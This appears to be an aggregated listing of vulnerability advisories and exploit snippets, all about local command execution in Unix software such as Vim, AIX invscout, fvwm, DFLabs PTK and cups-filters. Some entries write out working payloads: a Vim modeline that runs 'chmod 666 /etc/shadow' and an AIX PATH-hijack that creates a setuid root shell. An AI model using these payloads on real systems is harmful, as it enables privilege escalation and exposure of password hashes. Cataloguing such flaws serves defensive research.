Great Circle Associates Majordomo 1.94.4 - Local resend Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/902/info It is possible to execute arbitrary commands with elevated privileges through exploiting the majordomo binary, resend. A setuid root wrapper program calls resend after setuiding and setgiding to lowered but still...

BtiTracker 1.3.x - 1.4.x - Exploit

No description provided by source. !/usr/bin/env python xpl0it /\ \ /\ \ /\ \ //\ / \ ,\L\ /\ \ ,\ \ \ \ /' /\ \ /'\ /'/\ /\ /'/\ \ \ / /\ /\ \ \ /\ /\ /\ \L\ /\ //\ /\ \ \ \ \ / \ \ \ \ \ \ \ \ /\ \ \ \ \ \\ /\ \ \ \ \/ \ //////////// // // //// // \ //...

Platform Load Sharing Facility 4/5 LSF_ENVDIR Local Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7655/info It has been reported that Load Sharing Facility LSF does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system. LSF 5.1...

DFLabs PTK <= 1.0 - Local Command Execution Vulnerability

No description provided by source. ==================================================== Security Research Advisory Vulnerability name: DFLabs PTK Local Command Execution Vulnerability Advisory number: LC-2008-07 Advisory URL: http://www.ikkisoft.com...

cups-filters 'OPVPWrapper::loadDriver()'函数本地任意命令执行漏洞

Bugtraq ID:66158 CVE ID:CVE-2013-6476 CUPS是一款通用Unix打印系统，是Unix环境下的跨平台打印解决方案，基于Internet打印协议，提供大多数PostScript和raster打印机服务。 cups-filters 'OPVPWrapper::loadDriver'函数不正确过滤用户提交的输入，允许本地攻击者利用漏洞以'lp'上下文执行任意命令。 0 cups-filters 用户可参考如下厂商提供的安全公告获取补丁以修复该漏洞：...

AVAST Antivirus v8.0.1489 - Multiple Core Vulnerabilities

Title: ====== AVAST Antivirus v8.0.1489 - Multiple Core Vulnerabilities Date: ===== 2013-06-30 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=963 VL-ID: ===== 963 Common Vulnerability Scoring System: ==================================== 4.1 Introduction: =============...

CVE-2009-4261

Multiple directory traversal vulnerabilities in the iallocator framework in Ganeti 1.2.4 through 1.2.8, 2.0.0 through 2.0.4, and 2.1.0 before 2.1.0rc2 allow 1 remote attackers to execute arbitrary programs via a crafted external script name supplied through the HTTP remote API RAPI and allow 2...

Vim PySys_SetArgv函数本地命令执行漏洞

BUGTRAQ ID: 33447 CVECAN ID: CVE-2009-0316 VIM是一款免费开放源代码文本编辑器，可使用在Unix/Linux操作系统下。 VIM的python接口使用argv0调用PySysSetArgv函数。由于Python对sys.path变量附加了空字符串，如果工作目录中的文件名匹配VIM试图导入的python模块名，就可能允许本地用户在系统中执行任意代码。 VIM Development Group VIM...

vim 6.3 &lt; 6.3.082 (modlines) Local Command Execution Exploit

No description provided by source. 1 open up a text file. 2 insert at the top the information below. / vim: foldmethod=expr:foldexpr=glob"chmod\ 666\ /etc/shadow" / 3 if modlines = on anyone that opens the file with vim will execute the command: chmod 666 /etc/shadow Have fun making your own...

DFLabs PTK 1.0 - Local Command Execution

DFLabs PTK 1.0 - Local Command Execution ==================================================== Security Research Advisory Vulnerability name: DFLabs PTK Local Command Execution Vulnerability Advisory number: LC-2008-07 Advisory URL: http://www.ikkisoft.com...

DFLabs PTK 1.0 - Local Command Execution

==================================================== Security Research Advisory Vulnerability name: DFLabs PTK Local Command Execution Vulnerability Advisory number: LC-2008-07 Advisory URL: http://www.ikkisoft.com ==================================================== 1 Affected Software DFLabs PT...

DFLabs PTK <= 1.0 Local Command Execution Vulnerability

Exploit for unknown platform in category web applications ======================================================= DFLabs PTK = 1.0 Local Command Execution Vulnerability ======================================================= ==================================================== Security Research...

CVE-2007-2839

gfax 0.4.2 and probably other versions creates temporary files insecurely, which allows local users to execute arbitrary commands via unknown vectors...

CVE-2006-5969

CRLF injection vulnerability in the evalFolderLine function in fvwm 2.5.18 and earlier allows local users to execute arbitrary commands via carriage returns in a directory name, which is not properly handled by fvwm-menu-directory, a variant of CVE-2003-1308...

CVE-2003-1308

CRLF injection vulnerability in fvwm-menu-directory for fvwm 2.5.x before 2.5.10 and 2.4.x before 2.4.18 allows local users to execute arbitrary commands via carriage returns in a filename...

vim 6.3 6.3.082 - modlines Local Command Execution

vim 6.3 6.3.082 - modlines Local Command Execution 1 open up a text file. 2 insert at the top the information below. / vim: foldmethod=expr:foldexpr=glob"chmod\ 666\ /etc/shadow" / 3 if modlines = on anyone that opens the file with vim will execute the command: chmod 666 /etc/shadow Have fun maki...

vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit

Exploit for multiple platform in category local exploits ============================================================ vim 6.3 6.3.082 modlines Local Command Execution Exploit ============================================================ 1 open up a text file. 2 insert at the top the information...

CVE-2005-1970

Symantec pcAnywhere 10.5x and 11.x before 11.5, with "Launch with Windows" enabled, allows local users with physical access to execute arbitrary commands via the Caller Properties feature...

DEBIAN-CVE-2005-1705

gdb before 6.3 searches the current working directory to load the .gdbinit configuration file, which allows local users to execute arbitrary commands as the user running gdb...

AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability

Exploit for aix platform in category local exploits ============================================================= AIX uname echo '/usr/bin/chown root:system ./ksh' uname echo '/usr/bin/chmod 777 ./ksh' uname echo '/usr/bin/chmod +s ./ksh' uname /usr/bin/chmod 777 uname PATH=./ export PATH...